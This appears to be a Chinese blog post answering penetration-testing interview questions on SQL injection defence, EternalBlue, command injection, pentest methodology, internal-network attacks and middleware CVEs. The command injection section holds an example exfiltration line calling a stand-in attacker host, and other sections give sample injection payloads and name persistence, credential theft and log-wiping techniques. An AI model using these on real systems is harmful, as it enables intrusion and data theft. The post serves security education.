2025年渗透测试面试题总结-54(题目+回答)

发布于:2025-09-08 ⋅ 阅读:(21) ⋅ 点赞:(0)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

1、SQL注入的防护方法有哪些?
2、永恒之蓝的漏洞原理是什么?怎么做到的?
3、命令注入有哪些?
4、给你一个目标网站,你该如何进行测试?
5、给你一个后台登陆地点的网站,你能从中发现那些问题?
6、给你一千台服务器和交换机,你会如何进行扫描?
7、内网渗透了解多少?
8、中间件有哪些?
9、中间件有哪些已知的漏洞?

1. SQL注入防护方法

核心原则:数据与代码分离

  • 参数化查询(Prepared Statements)
    使用占位符(如?@param)替代拼接SQL,数据库区分指令与数据(如Java的PreparedStatement、Python的cursor.execute() )。
  • 输入过滤与白名单校验
    对用户输入进行类型/长度约束(如仅允许邮箱格式),禁用高危字符(';--)。
  • 最小权限原则
    数据库账户仅赋予必要权限(禁用DROPFILE等)。
  • ORM框架使用
    Hibernate、Entity Framework等自动转义输入。
  • Web应用防火墙(WAF)
    部署ModSecurity等规则引擎拦截注入特征(如UNION SELECT)。
  • 错误信息屏蔽
    避免数据库报错信息直接返回前端。

2. 永恒之蓝(EternalBlue)漏洞原理

CVE编号:CVE-2017-0144
漏洞根源:SMBv1协议处理SMBv1 Trans2请求的缓冲区溢出漏洞。
攻击流程

  1. 畸形数据包触发溢出
    攻击者发送特制的SMB_COM_TRANSACTION2请求,覆盖内核内存。
  2. 内核权限执行Shellcode
    利用溢出覆盖函数指针,执行攻击者代码(如NSA开发的DoublePulsar后门)。
  3. 横向传播
    通过SMB协议在内网自动扩散(如WannaCry勒索病毒)。
    修复方案
    禁用SMBv1,安装MS17-010补丁,关闭445端口。

3. 命令注入类型与案例

分类方式

  • 直接命令注入
    用户输入直接拼接至系统命令(如os.system("ping " + user_input)),可通过;&|执行多条命令。
  • 间接注入(如环境变量污染)
    篡改PATHLD_PRELOAD劫持动态链接库。
  • 盲注(无回显)
    通过时间延迟(sleep 5)或DNS外带数据(curl attacker.com?data=$(whoami) )判断结果。
    高危函数
    PHP的system()/exec()、Python的os.popen() 、Node.js 的child_process.exec()

4. 目标网站渗透测试流程

分阶段方法论

阶段 关键操作
信息收集 WHOIS查询、子域名爆破(Amass)、端口扫描(Nmap)、框架指纹识别(Wappalyzer)
漏洞扫描 自动化工具(Burp Suite、Nessus) + 手动验证(如修改参数、边界值测试)
漏洞利用 SQL注入工具(sqlmap)、XSS载荷测试、文件上传绕过(Content-Type欺骗)
权限提升 利用系统/服务漏洞提权(如Dirty Pipe)、数据库弱口令爆破
权限维持 植入Webshell(蚁剑/冰蝎)、创建隐藏账户、SSH密钥后门
内网横向移动 ARP欺骗、Pass-the-Hash攻击、域渗透(BloodHound分析)
痕迹清理 删除日志(/var/log/)、隐藏进程(rootkit)

5. 后台登录点安全审计要点

  • 认证机制缺陷
    • 弱口令(admin/admin123)
    • 无验证码或验证码可绕过(OCR识别、重复使用)
    • 未限制登录尝试频率(爆破漏洞)
  • 传输与存储风险
    • HTTP明文传输密码(应强制HTTPS)
    • Cookie未设置HttpOnly(XSS窃取会话)
  • 逻辑漏洞
    • 响应差异暴露用户存在性(枚举用户名)
    • 密码重置功能缺陷(Token未绑定用户、可预测Token)
  • 注入漏洞
    • SQL注入(' OR 1=1 --
    • XSS注入(登录表单插入<script>alert(1)</script>

6. 千台服务器/交换机扫描策略

分布式架构设计

mermaigraph LR A[控制节点] --> B[任务队列 Kafka/RabbitMQ] B --> C[扫描节点1-N] C --> D[结果存储 ES]

关键技术点

  • IP分段与负载均衡
    使用nmap -sS -iL targets.txt -oA scan --max-rate 1000分批次扫描,避免流量洪峰。
  • 指纹识别优化
    并行化服务识别(-sV)与OS探测(-O)。
  • 交换机特殊处理
    SNMP扫描(snmpwalk)、ARP扫描(netdiscover),避开ICMP限制。
  • 结果聚合
    通过Elasticsearch + Kibana可视化漏洞分布。

7. 内网渗透核心技术

攻击链关键步骤

  1. 信息收集
    ARP扫描、NetBIOS枚举、域控制器定位(nltest /dclist)。
  2. 权限提升
    本地提权(CVE-2021-4034)、凭证窃取(Mimikatz抓取LSASS内存)。
  3. 横向移动
    • 协议利用:SMB爆破(CrackMapExec)、WinRM远程执行
    • 中间人攻击:LLMNR/NBT-NS投毒(Responder)
    • 域渗透:黄金票据伪造、DCSync攻击获取域控权限
  4. 数据窃取与持久化
    隐蔽隧道(DNS/ICMP)、GPO组策略后门。

8. 常见中间件列表

类型 代表产品
Web服务器 Apache、Nginx、IIS
应用服务器 Tomcat、WebLogic、JBoss/WildFly
反向代理 Traefik、HAProxy
消息队列 RabbitMQ、Kafka、ActiveMQ
API网关 Kong、Tyk

9. 中间件经典漏洞案例

中间件 漏洞 影响
Apache CVE-2021-41773(路径遍历) 读取服务器敏感文件
Nginx CVE-2013-2028(栈溢出) 远程代码执行(RCE)
Tomcat CVE-2020-1938(Ghostcat) AJP协议文件读取/RCE
WebLogic CVE-2020-14882(未授权命令执行) 控制服务器
JBoss JMXInvokerServlet 反序列化 远程代码执行

网站公告

今日签到

点亮在社区的每一天
去签到